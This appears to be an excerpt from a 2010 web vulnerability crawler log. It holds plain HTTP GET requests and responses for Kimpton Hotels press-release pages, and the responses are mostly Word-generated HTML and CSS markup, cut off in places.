mso-bidi-font-family:Times;}span.CharChar {mso-style-name:" Char Char"; mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:Times;}span.dfs111 {mso-style-name:dfs111; font-family:Verdana; mso-ascii-font-family:Verdana; mso-hansi-font-family:Verdana;}span.emailstyle17 {mso-style-name:emailstyle17; mso-style-noshow:yes; mso-ansi-font-size:10.0pt; mso-bidi-font-size:10.0pt; font-family:Arial; mso-ascii-font-family:Arial; mso-hansi-font-family:Arial; mso-bidi-font-family:Arial; color:windowtext;}span.kim10 {mso-style-name:kim10;}span.1 {mso-style-name:1; mso-style-noshow:yes; mso-ansi-font-size:10.0pt; mso-bidi-font-size:10.0pt; font-family:Arial; mso-ascii-font-family:Arial; mso-hansi-font-family:Arial; mso-bidi-font-family:Arial; color:navy;} /* Page Definitions */@page {mso-footnote-separator:url(":images:header.htm") fs; mso-footnote-continuation-separator:url(":images:header.htm") fcs; mso-endnote-separator:url(":images:header.htm") es; mso-endnote-continuation-separator:url(":images:header.htm") ecs;}@page Section1 {size:8.5in 11.0in; margin:1.0in 1.0in 1.0in 1.0in; mso-header-margin:.5in; mso-footer-margin:.5in; mso-paper-source:0;}div.Section1 {page:Section1;} /* List Definitions */@list l0 {mso-list-id:-1802115189; mso-list-type:hybrid; mso-list-template-ids:201068776 -1 -1 -1 -1 -1 -1 -1 -1 -1;}@list l0:level1 {mso-level-suffix:none; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level2 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level3 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level4 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level5 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level6 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level7 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level8 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level9 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l1 {mso-list-id:1007153; mso-list-type:hybrid; mso-list-template-ids:-1871125328 1670048874 197641 328713 66569 197641 328713 66569 197641 328713;}@list l1:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.25in; mso-level-number-position:left; margin-left:.25in; text-indent:-.25in; mso-ansi-font-size:8.0pt; font-family:Symbol;}@list l2 {mso-list-id:102651134; mso-list-type:hybrid; mso-list-template-ids:-718892134 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l2:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l3 {mso-list-id:154613679; mso-list-type:hybrid; mso-list-template-ids:-695294530 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l3:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l4 {mso-list-id:533346185; mso-list-type:hybrid; mso-list-template-ids:-2007724532 984073 1639433 1770505 984073 1639433 1770505 984073 1639433 1770505;}@list l4:level1 {mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in;}@list l5 {mso-list-id:806508694; mso-list-type:hybrid; mso-list-template-ids:-2137327588 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l5:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l5:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l5:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l5:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l5:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l5:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l5:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l5:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l5:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l6 {mso-list-id:973101145; mso-list-type:hybrid; mso-list-template-ids:135307080 197641 197641 328713 66569 197641 328713 66569 197641 328713;}@list l6:level1 {mso-level-number-format:bullet; mso-level-text:o; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:"Courier New"; mso-bidi-font-family:Arial;}@list l7 {mso-list-id:1030841178; mso-list-type:hybrid; mso-list-template-ids:1856390760 -1888849478 197641 328713 66569 197641 328713 66569 197641 328713;}@list l7:level1 {mso-level-number-format:bullet; mso-level-text:-; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Arial; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:Symbol;}@list l7:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l8 {mso-list-id:1089353841; mso-list-template-ids:-304692582;}@list l8:level1 {mso-level-number-format:bullet; mso-level-text:\F0A7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; mso-ansi-font-size:10.0pt; font-family:Wingdings;}@list l8:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l9 {mso-list-id:1488857345; mso-list-type:hybrid; mso-list-template-ids:-1802839462 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l9:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l9:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l10 {mso-list-id:1513913928; mso-list-template-ids:-579186908;}@list l10:level1 {mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in;}@list l11 {mso-list-id:1566069662; mso-list-type:hybrid; mso-list-template-ids:291660558 1253897630 197641 328713 66569 197641 328713 66569 197641 328713;}@list l11:level1 {mso-level-number-format:bullet; mso-level-text:\F0FC; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Wingd..
- /pdfs/press/html/50th-Hotel-0610/

/pdfs/press/html/50th-Hotel-0610/

http://www.kimptonhotels.com/pdfs/press/html/50th-Hotel-0610/

Request

GET /pdfs/press/html/50th-Hotel-0610/ HTTP/1.1
Referer: http://www.kimptonhotels.com/pdfs/press/html/50th-Hotel-0610/index.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: www.kimptonhotels.com
Cookie: ASP.NET_SessionId=hyd2ui55rxmm2q55xslvrq55; ASPSESSIONIDAQQBQDDR=JDFEFPHBNDJFCIHIDDMHMENO
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:10:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 32413
Content-Type: text/html
Cache-control: private


<html xmlns:v="urn:schemas-microsoft-com:vml"xmlns:o="urn:schemas-microsoft-com:office:office"xmlns:w="urn:schemas-microsoft-com:office:word"xmlns:dt="uuid:C2F41010-65B3-11d1-A29F-00AA00C14882"xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"xmlns:css="http://macVmlSchemaUri" xmlns="http://www.w3.org/TR/REC-html40"><head><meta name=Title content=" "><meta name=Keywords content=""><meta http-equiv=Content-Type content="text/html; charset=windows-1252"><meta name=ProgId content=Word.Document><meta name=Generator content="Microsoft Word 2008"><meta name=Originator content="Microsoft Word 2008"><link rel=File-List href="images/filelist.xml"><link rel=Edit-Time-Data href="images/editdata.mso"><!--[if !mso]><style>v\:* {behavior:url(#default#VML);}o\:* {behavior:url(#default#VML);}w\:* {behavior:url(#default#VML);}.shape {behavior:url(#default#VML);}</style><![endif]--><title> </title><!--[if gte mso 9]><xml> <o:DocumentProperties> <o:Author>Marliese Engel</o:Author> <o:Template>Normal.dotm</o:Template> <o:LastAuthor>Marie Chen</o:LastAuthor> <o:Revision>2</o:Revision> <o:TotalTime>1</o:TotalTime> <o:LastPrinted>2010-05-14T00:13:00Z</o:LastPrinted> <o:Created>2010-06-15T21:22:00Z</o:Created> <o:LastSaved>2010-06-15T21:22:00Z</o:LastSaved> <o:Pages>1</o:Pages> <o:Words>977</o:Words> <o:Characters>5570</o:Characters> <o:Company>Baltz &amp; Company</o:Company> <o:Lines>46</o:Lines> <o:Paragraphs>11</o:Paragraphs> <o:CharactersWithSpaces>6840</o:CharactersWithSpaces> <o:Version>12.0</o:Version> </o:DocumentProperties> <o:CustomDocumentProperties> <o:_NewReviewCycle dt:dt="string"></o:_NewReviewCycle> </o:CustomDocumentProperties> <o:OfficeDocumentSettings> <o:PixelsPerInch>96</o:PixelsPerInch> <o:TargetScreenSize>800x600</o:TargetScreenSize> </o:OfficeDocumentSettings></xml><![endif]--><!--[if gte mso 9]><xml> <w:WordDocument> <w:TrackMoves>false</w:TrackMoves> <w:TrackFormatting/> <w:PunctuationKerning/> <w:ValidateAgainstSchemas/> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:Compatibility> <w:BreakWrappedTables/> <w:UseNormalStyleForList/> <w:DontUseIndentAsNumberingTabStop/> <w:DontGrowAutofit/> <w:FELineBreak11/> <w:WW11IndentRules/> <w:DontAutofitConstrainedTables/> <w:AutofitLikeWW11/> <w:HangulWidthLikeWW11/> </w:Compatibility> </w:WordDocument></xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" LatentStyleCount="276"> </w:LatentStyles></xml><![endif]--><style><!-- /* Font Definitions */@font-face {font-family:Arial; panose-1:2 11 6 4 2 2 2 2 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:"Courier New"; panose-1:2 7 3 9 2 2 5 2 4 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Times; panose-1:2 0 5 0 0 0 0 0 0 0; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Wingdings; panose-1:5 2 1 2 1 8 4 8 7 8; mso-font-charset:2; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:0 0 65536 0 128 0;}@font-face {font-family:Calibri; panose-1:2 15 5 2 2 2 4 3 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Tahoma; panose-1:2 11 6 4 3 5 4 4 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:"Arial Unicode MS"; mso-font-charset:128; mso-generic-font-family:swiss; mso-font-pitch:variable; mso-font-signature:-1 -23 1056964608 0 -16695552 0;}@font-face {font-family:Consolas; panose-1:2 11 6 9 2 2 4 3 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;} /* Style Definitions */p.MsoNormal, li.MsoNormal, div.MsoNormal {mso-style-parent:""; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:11.0pt; font-family:"Times New Roman"; mso-ascii-font-family:Calibri; mso-fareast-font-family:Calibri; mso-hansi-font-family:Calibri; mso-bidi-font-family:"Times New Roman";}h1 {mso-style-link:"Heading 1 Char"; mso-margin-top-alt:auto; margin-right:0in; mso-margin-bottom-alt:auto; margin-left:0in; mso-pagination:widow-orphan; mso-outline-level:1; font-size:24.0pt; mso-bidi-font-size:10.0pt; font-family:"Times New Roman"; mso-ascii-font-family:"Arial Unicode MS"; mso-fareast-font-family:"Arial Unicode MS"; mso-hansi-font-family:"Arial Unicode MS"; font-weight:bold; mso-bidi-font-weight:normal;}p.MsoCommentText, li.MsoCommentText, div.MsoCommentText {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:"Times New Roman"; mso-ascii-font-family:Calibri; mso-fareast-font-family:Calibri; mso-hansi-font-family:Calibri; mso-bidi-font-family:"Times New Roman";}p.MsoHeader, li.MsoHeader, div.MsoHeader {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; tab-stops:center 3.0in right 6.0in; font-size:11.0pt; font-family:"Times New Roman"; mso-ascii-font-family:Calibri; mso-fareast-font-family:Calibri; mso-hansi-font-family:Calibri; mso-bidi-font-family:"Times New Roman";}p.MsoFooter, li.MsoFooter, div.MsoFooter {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; tab-stops:center 3.0in right 6.0in; font-size:11.0pt; font-family:"Times New Roman"; mso-ascii-font-family:Calibri; mso-fareast-font-family:Calibri; mso-hansi-font-family:Calibri; mso-bidi-font-family:"Times New Roman";}span.MsoCommentReference {mso-style-noshow:yes; mso-ansi-font-size:8.0pt; mso-bidi-font-size:8.0pt;}p.MsoBodyText2, li.MsoBodyText2, div.MsoBodyText2 {margin-top:0in; margin-right:0in; margin-bottom:6.0pt; margin-left:0in; line-height:200%; mso-pagination:widow-orphan; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}a:link, span.MsoHyperlink {color:blue; text-decoration:underline; text-underline:single;}a:visited, span.MsoHyperlinkFollowed {color:purple; text-decoration:underline; text-underline:single;}strong {mso-bidi-font-weight:bold;}p.MsoDocumentMap, li.MsoDocumentMap, div.MsoDocumentMap {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; background:navy; font-size:10.0pt; font-family:Tahoma; mso-fareast-font-family:Calibri; mso-bidi-font-family:Tahoma;}p.MsoPlainText, li.MsoPlainText, div.MsoPlainText {mso-style-noshow:yes; mso-style-link:"Plain Text Char"; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.5pt; font-family:"Times New Roman"; mso-ascii-font-family:Consolas; mso-fareast-font-family:Calibri; mso-hansi-font-family:Consolas; mso-bidi-font-family:"Times New Roman";}p {mso-margin-top-alt:auto; margin-right:0in; mso-margin-bottom-alt:auto; margin-left:0in; mso-pagination:widow-orphan; font-size:12.0pt; font-family:"Times New Roman"; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:"Times New Roman";}p.MsoCommentSubject, li.MsoCommentSubject, div.MsoCommentSubject {mso-style-noshow:yes; mso-style-parent:"Comment Text"; mso-style-next:"Comment Text"; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:"Times New Roman"; mso-ascii-font-family:Calibri; mso-fareast-font-family:Calibri; mso-hansi-font-family:Calibri; mso-bidi-font-family:"Times New Roman"; font-weight:bold;}p.MsoAcetate, li.MsoAcetate, div.MsoAcetate {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:8.0pt; font-family:Tahoma; mso-fareast-font-family:Calibri; mso-bidi-font-family:Tahoma;}span.Heading1Char {mso-style-name:"Heading 1 Char"; mso-style-locked:yes; mso-style-link:"Heading 1"; mso-ansi-font-size:24.0pt; font-family:"Arial Unicode MS"; mso-ascii-font-family:"Arial Unicode MS"; mso-fareast-font-family:"Arial Unicode MS"; mso-hansi-font-family:"Arial Unicode MS"; mso-font-kerning:18.0pt; mso-ansi-language:EN-US; mso-fareast-language:EN-US; font-weight:bold; mso-bidi-font-weight:normal;}span.PlainTextChar {mso-style-name:"Plain Text Char"; mso-style-noshow:yes; mso-style-locked:yes; mso-style-link:"Plain Text"; mso-ansi-font-size:10.5pt; mso-bidi-font-size:10.5pt; font-family:Consolas; mso-ascii-font-family:Consolas; mso-fareast-font-family:Calibri; mso-hansi-font-family:Consolas; mso-ansi-language:EN-US; mso-fareast-language:EN-US;}p.CharChar1CharChar, li.CharChar1CharChar, div.CharChar1CharChar {mso-style-name:" Char Char1 Char Char"; margin-top:0in; margin-right:0in; margin-bottom:8.0pt; margin-left:0in; text-align:justify; line-height:12.0pt; mso-line-height-rule:exactly; mso-pagination:none; mso-layout-grid-align:none; font-size:10.0pt; font-family:Arial; mso-ascii-font-family:"Times New Roman"; mso-fareast-font-family:"Times New Roman"; mso-hansi-font-family:"Times New Roman"; mso-bidi-font-family:Arial; mso-ansi-language:DE-CH;}p.Default, li.Default, div.Default {mso-style-name:Default; mso-style-parent:""; margin:0in; margin-bottom:.0001pt; mso-pagination:none; mso-layout-grid-align:none; text-autospace:none; font-size:12.0pt; font-family:Arial; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:Arial; color:black;} /* Page Definitions */@page {mso-footnote-separator:url(":images:header.htm") fs; mso-footnote-continuation-separator:url(":images:header.htm") fcs; mso-endnote-separator:url(":images:header.htm") es; mso-endnote-continuation-separator:url(":images:header.htm") ecs;}@page Section1 {size:8.5in 11.0in; margin:1.0in 1.0in 1.0in 1.0in; mso-header-margin:.5in; mso-footer-margin:.5in; mso-paper-source:0;}div.Section1 {page:Section1;} /* List Definitions */@list l0 {mso-list-id:578759532; mso-list-type:hybrid; mso-list-template-ids:1908186806 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l0:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.25in; mso-level-number-position:left; margin-left:.25in; text-indent:-.25in; font-family:Symbol;}@list l1 {mso-list-id:700908021; mso-list-type:hybrid; mso-list-template-ids:1744995092 197641 197641 328713 66569 197641 328713 66569 197641 328713;}@list l1:level1 {mso-level-number-format:bullet; mso-level-text:o; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:"Courier New"; mso-bidi-font-family:Arial;}@list l2 {mso-list-id:762846213; mso-list-type:hybrid; mso-list-template-ids:737695120 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l2:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l3 {mso-list-id:1241058028; mso-list-type:hybrid; mso-list-template-ids:1236678956 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l3:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l4 {mso-list-id:1319529687; mso-list-type:hybrid; mso-list-template-ids:2038327704 1253897630 197641 328713 66569 197641 328713 66569 197641 328713;}@list l4:level1 {mso-level-number-format:bullet; mso-level-text:\F0FC; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Wingdings;}@list l4:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l4:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l4:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l4:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l4:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l4:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l4:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l4:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l5 {mso-list-id:1597444569; mso-list-type:hybrid; mso-list-template-ids:-1248318078 197641 197641 328713 66569 197641 328713 66569 197641 328713;}@list l5:level1 {mso-level-number-format:bullet; mso-level-text:o; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:"Courier New"; mso-bidi-font-family:Arial;}@list l6 {mso-list-id:1649477657; mso-list-type:hybrid; mso-list-template-ids:-1886230016 328713 197641 328713 66569 197641 328713 66569 197641 328713;}@list l6:level1 {mso-level-number-format:bullet; mso-level-text:\F0A7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Wingdings;}@list l7 {mso-list-id:1836218086; mso-list-type:hybrid; mso-list-template-ids:1327258538 197641 197641 328713 66569 197641 328713 66569 197641 328713;}@list l7:level1 {mso-level-number-format:bullet; mso-level-text:o; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:"Courier New"; mso-bidi-font-family:Arial;}@list l8 {mso-list-id:1851023485; mso-list-type:hybrid; mso-list-template-ids:-1010268010 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l8:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l9 {mso-list-id:2057967201; mso-list-type:hybrid; mso-list-template-ids:-2130538154 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l9:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l9:level2 {mso-level-number-format:bullet; mso-level-text:o; mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in; font-family:"Courier New"; mso-bidi-font-family:Arial;}@list l10 {mso-list-id:2140606293; mso-list-type:hybrid; mso-list-template-ids:-893243000 197641 197641 328713 66569 197641 328713 66569 197641 328713;}@list l10:level1 {mso-level-number-format:bullet; mso-level-text:o; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:"Courier New"; mso-bidi-font-family:Arial;}ol {margin-bottom:0in;}ul {margin-bottom:0in;}--></style><!--[if gte mso 10]><style> /* Style Definitions */table.MsoNormalTable {mso-style-name:"Table Normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-parent:""; mso-padding-alt:0in 5.4pt 0in 5.4pt; mso-para-margin:0in; mso-para-margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:"Times New Roman";}</style><![endif]--><!--[if gte mso 9]><xml> <o:shapedefaults v:ext="edit" spidmax="2050"/></xml><![endif]--><!--[if gte mso 9]><xml> <o:shapelayout v:ext="edit"> <o:idmap v:ext="edit" data="1"/> </o:shapelayout></xml><![endif]--></head><body lang=EN-US link=blue vlink=purple style='tab-interval:.5in'><div class=Section1><p class=MsoNormal><span style='font-family:Arial;mso-bidi-font-family:Arial'><!--[if gte vml 1]><v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f"> <v:stroke joinstyle="miter"/> <v:formulas> <v:f eqn="if lineDrawn pixelLineWidth 0"/> <v:f eqn="sum @0 1 0"/> <v:f eqn="sum 0 0 @1"/> <v:f eqn="prod @2 1 2"/> <v:f eqn="prod @3 21600 pixelWidth"/> <v:f eqn="prod @3 21600 pixelHeight"/> <v:f eqn="sum @0 0 1"/> <v:f eqn="prod @6 1 2"/> <v:f eqn="prod @7 21600 pixelWidth"/> <v:f eqn="sum @8 21600 0"/> <v:f eqn="prod @7 21600 pixelHeight"/> <v:f eqn="sum @10 21600 0"/> </v:formulas> <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/> <o:lock v:ext="edit" aspectratio="t"/></v:shapetype><v:shape id="_x0000_i1025" type="#_x0000_t75" style='width:152pt; height:43pt'> <v:imagedata src="images/image001.jpg" o:title="Kimpton New Logo"/></v:shape><![endif]--><![if !vml]><img width=154 height=45src="images/image002.gif" v:shapes="_x0000_i1025"><![endif]><bstyle='mso-bidi-font-weight:normal'><o:p></o:p></b></span></p><p class=MsoNormal><b style='mso-bidi-font-weight:normal'><spanstyle='font-family:Arial;mso-bidi-font-family:Arial'><o:p>&nbsp;</o:p></span></b></p><p class=MsoNormal style='mso-outline-level:1'><b style='mso-bidi-font-weight:normal'><span style='font-size:16.0pt;font-family:Arial;mso-bidi-font-family:Arial'>FOR IMMEDIATE RELEASE<o:p></o:p></span></b></p><p class=MsoNormal><b style='mso-bidi-font-weight:normal'><spanstyle='font-family:Arial;mso-bidi-font-family:Arial'><o:p>&nbsp;</o:p></span></b></p><p class=MsoNormal><i style='mso-bidi-font-style:normal'><spanstyle='font-size:10.0pt;mso-bidi-font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial'>Media Contacts:</span></i><i style='mso-bidi-font-style:normal'><spanstyle='font-size:10.0pt;font-family:Arial;mso-bidi-font-family:Arial'><o:p></o:p></span></i></p><p class=MsoNormal style='mso-outline-level:1'><b><span style='font-size:10.0pt;mso-bidi-font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>Baltz &amp; Company for Kimpton<o:p></o:p></span></b></p><p class=Ms..
- /pdfs/press/html/50th-Hotel-0610/index.html

/pdfs/press/html/50th-Hotel-0610/index.html

http://www.kimptonhotels.com/pdfs/press/html/50th-Hotel-0610/index.html

Request

GET /pdfs/press/html/50th-Hotel-0610/index.html HTTP/1.1
Referer: http://www.kimptonhotels.com/about-us/press-releases.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: www.kimptonhotels.com
Cookie: ASP.NET_SessionId=hyd2ui55rxmm2q55xslvrq55; ASPSESSIONIDAQQBQDDR=JDFEFPHBNDJFCIHIDDMHMENO
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:10:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 32413
Content-Type: text/html
Cache-control: private


<html xmlns:v="urn:schemas-microsoft-com:vml"xmlns:o="urn:schemas-microsoft-com:office:office"xmlns:w="urn:schemas-microsoft-com:office:word"xmlns:dt="uuid:C2F41010-65B3-11d1-A29F-00AA00C14882"xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"xmlns:css="http://macVmlSchemaUri" xmlns="http://www.w3.org/TR/REC-html40"><head><meta name=Title content=" "><meta name=Keywords content=""><meta http-equiv=Content-Type content="text/html; charset=windows-1252"><meta name=ProgId content=Word.Document><meta name=Generator content="Microsoft Word 2008"><meta name=Originator content="Microsoft Word 2008"><link rel=File-List href="images/filelist.xml"><link rel=Edit-Time-Data href="images/editdata.mso"><!--[if !mso]><style>v\:* {behavior:url(#default#VML);}o\:* {behavior:url(#default#VML);}w\:* {behavior:url(#default#VML);}.shape {behavior:url(#default#VML);}</style><![endif]--><title> </title><!--[if gte mso 9]><xml> <o:DocumentProperties> <o:Author>Marliese Engel</o:Author> <o:Template>Normal.dotm</o:Template> 